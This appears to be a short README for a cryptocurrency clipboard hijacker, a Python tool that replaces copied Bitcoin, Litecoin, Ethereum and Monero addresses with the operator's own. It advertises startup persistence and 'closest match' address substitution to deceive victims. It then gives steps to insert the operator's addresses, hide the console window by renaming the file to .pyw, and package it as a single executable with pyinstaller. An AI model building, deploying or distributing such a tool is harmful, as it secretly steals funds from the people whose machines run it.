Reads clipboard for crypto address and changes them
- Supports Bitcoin, Litecoin, Ethereum, Monero clipping
- Auto adds to start up
- Supports multiple addresses
- Find closest match out of your list of addresses
- Pip install all the requirements in the file
- Edit main.py and enter all your crypto address
- Pip install pyinstaller
- Change main.py into main.pyw (This will hide the console)
- CMD -> pyinstaller --onefile (filename.py)